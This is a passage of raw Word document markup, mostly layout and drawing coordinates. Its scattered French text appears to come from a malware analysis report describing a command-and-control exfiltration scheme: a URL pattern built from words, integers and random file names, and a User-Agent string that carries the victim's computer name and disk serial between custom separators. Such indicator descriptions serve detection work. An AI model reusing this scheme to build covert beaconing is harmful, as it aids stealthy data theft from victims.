                            <a:pt x="6350" y="5333365"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="5333365"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="4512945"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="4512945"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3907155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="3907155"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="3302635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="3302635"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="2266315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="2266315"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1915795"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1915795"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="1564005"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="1564005"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="959485"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="959485"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="353695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760720" y="353695"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="576707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104" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2225039</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3953519</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="5713730"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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7137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713730">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="571373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128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3947169</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="5726430"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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7264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726430">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="572643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1232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2969269</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5692139" cy="4538980"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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2139" cy="45389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92139" h="4538980">
                          <a:moveTo>
                            <a:pt x="5691505" y="4318000"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5691505" y="4517390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1324610" y="4318635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5692139" y="4318635"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="634" y="4538980"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="634" y="4339590"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="855345" y="4339590"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="855345" y="4538980"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="4340225"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="855979" y="4340225"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1325245" y="4127500"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1325245" y="3928110"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2179955" y="3928110"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2179955" y="4127500"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1324610" y="3928745"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2180590" y="3928745"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1325245" y="3912870"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1325245" y="3713480"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5691505" y="3713480"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5691505" y="3912870"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1324610" y="3714115"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5692139" y="3714115"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1325245" y="3696970"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1325245" y="3497580"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5690235" y="3497580"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5690235" y="3696970"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1324610" y="3498215"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5690870" y="3498215"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1325245" y="3482340"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1325245" y="3282950"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5691505" y="3282950"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5691505" y="3482340"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1324610" y="3283585"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5692139" y="3283585"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1325245" y="2390140"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1325245" y="2190750"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4717415" y="2190750"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4717415" y="2390140"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1324610" y="2191385"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4718050" y="2191385"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1325245" y="2174239"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1325245" y="1974850"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5691505" y="1974850"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5691505" y="2174239"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1324610" y="1975485"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5692139" y="1975485"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1325245" y="1784350"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1325245" y="1584960"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4062095" y="1584960"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4062095" y="1784350"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1324610" y="1585595"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4062729" y="1585595"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1325245" y="1569720"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1325245" y="1370330"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4553585" y="1370330"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4553585" y="1569720"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1324610" y="1370965"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4554219" y="1370965"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2834005" y="415290"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2834005" y="215899"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3687445" y="215899"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3687445" y="415290"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2833370" y="216535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3688079" y="216535"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2562225" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2562225" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3416935" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3416935" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2561590" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="341756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5568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7287269</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2917190" cy="1019809"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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7190" cy="1019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7190" h="1019809">
                          <a:moveTo>
                            <a:pt x="634" y="1019809"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="634" y="820420"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="445134" y="820420"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="445134" y="1019809"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="821055"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="445769" y="821055"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="810895" y="805180"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="810895" y="605789"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1255395" y="605789"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1255395" y="805180"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="810260" y="606425"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1256029" y="606425"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1325245" y="415289"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1325245" y="215900"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2916555" y="215900"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2916555" y="415289"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1324610" y="216535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2917190" y="216535"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1325245" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="132524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4784" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2259329</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7893059</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4367529" cy="605158"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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67529" cy="6051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67529" h="605155">
                          <a:moveTo>
                            <a:pt x="0" y="605155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2165350" y="605155"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="414020"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="214630"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4293234" y="214630"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4293234" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4293870" y="21526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4366895" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4366895" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="436752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5808" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4424045</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8497579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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2976" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2259329</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8497579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2246630" cy="431168"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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6630" cy="4311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46630" h="431164">
                          <a:moveTo>
                            <a:pt x="0" y="431164"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1101090" y="431164"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="415289"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="215899"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2245994" y="215899"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2245994" y="415289"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="216534"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2246630" y="21653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4000" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3359785</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8928109</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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0144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8928109</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1325248" cy="589279"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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5248" cy="5892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5245" h="589279">
                          <a:moveTo>
                            <a:pt x="634" y="589279"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="634" y="389890"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1181735" y="389890"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1181735" y="589279"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="390524"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1182370" y="390524"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1325245" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="132524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116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990597</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="1719579"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="104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 l="-11" r="-11" t="-36" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="17195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1719579">
                          <a:moveTo>
                            <a:pt x="0" y="1719579"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="1719579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171957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219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0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321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0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4240" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1558289</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2686705</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4480776" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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077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6 – Structure de l’URL utilisée à des fins d’exfiltration de l’empreinte de la victime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5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2954878</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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L'opérateur utilise explicitement l'en-tête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User-Agent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pour extraire l'empreinte digitale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6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3170143</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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l'hôte, celle-ci étant intégrée dans une chaîne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User-Agent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spécialement conçue à l'aide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7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3366793</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1650070" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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007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délimiteurs personnalisés.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8336" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3931920</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3957978</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1060302" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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030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Modèle / Valeur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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1327150</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3957978</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="509141" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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1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Champ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0384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4324573</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3221710" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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17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http(s)://[C2]/[MOT]/[ENTIER]/[ENTIER]/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14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4436133</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="974944" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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49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Schéma d’URL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2432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4539838</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2731782" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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1782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[CHAÎNE_ALÉATOIRE]/[ENTIER].[EXT]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3456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4929728</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4456479" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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5647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14"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">follow, sat, component, misfortune, endanger,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44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4954293</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1330208" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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020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Mots utilisés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55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5127648</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="633378" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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3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chemin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6528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5144993</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3385159" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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8515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menace, reproof, artistic, list, mosquito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75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5519443</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="470187" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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1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Entiers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8576" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2260600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5519443</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1029567" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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956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Entre 1 et 1 000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5870598</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1060441" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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04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Chaîne aléatoire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0624" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2260600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5870598</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2868976" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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7 à 11 caractères alphanumériques aléatoires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1648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6237193</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4355096" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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509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.mov, .ato, .php, .spl, .xml, .spl, .htm, .rmvb, .xh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2672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6452458</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4353699" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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369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tm, .gtp, .aspx, .bin, .asp, .swf, .jsp, .dbc, .cs,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36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6564018</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="718993" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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9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Extensions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4720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6667723</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4354816" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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481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.mbx, .js, .cc, .asf, .kfx, .swf, .ega, .download,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5744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6882988</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="852956" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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95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brk, .html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6768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7272878</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4466335" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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633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3"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0;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7792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7293833</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="954785" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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478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4"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">User-Agent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8816" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1888490</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7295538</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="377708" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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70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codé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0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7488143</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1588058" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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805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rv:11.0) like Gecko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08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7490483</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="431771" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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7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 dur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1888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7878033</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4358448" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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844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Mozilla/5.0</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle28"/>
                            <w:spacing w:val="213"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D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327"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D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…</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle28"/>
                            <w:spacing w:val="214"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D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327"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D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[SEP1][NOM_ORDINATEUR][SEP2]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29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7878033</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1272374" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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237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Schéma du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User-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3936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8093298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4283709" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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370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[NUMÉRO_DE_SÉRIE_DISQUE_HEXA][SEP3]/=[ALÉATOIRE]/= …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4960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8093298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="444334" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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33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Agent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5984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8483188</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2264155" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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415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Sep 1 : ##, !!, ??, ==, ::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70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8528708</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="835543" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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55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Séparateurs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8032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8698453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2346070" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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607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Sep 2 : _, @, #, =, %, ?, !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90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8702063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="804428" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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4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d’empreinte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8875418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="749906" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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99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(f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ingerprinf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1104" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2279015</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8913718</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1097711" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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771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Sep 3 : ::, ?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2128" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2260600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9296270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="371293" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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129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2114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3152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9303608</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1179435" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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943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Content-Length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41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0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520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0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62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0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724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0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827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0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71929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1265564</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="372109"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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72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7210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72109"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="37210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0" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3425189</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1266199</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1182370" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10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37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237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181735" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1181735" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
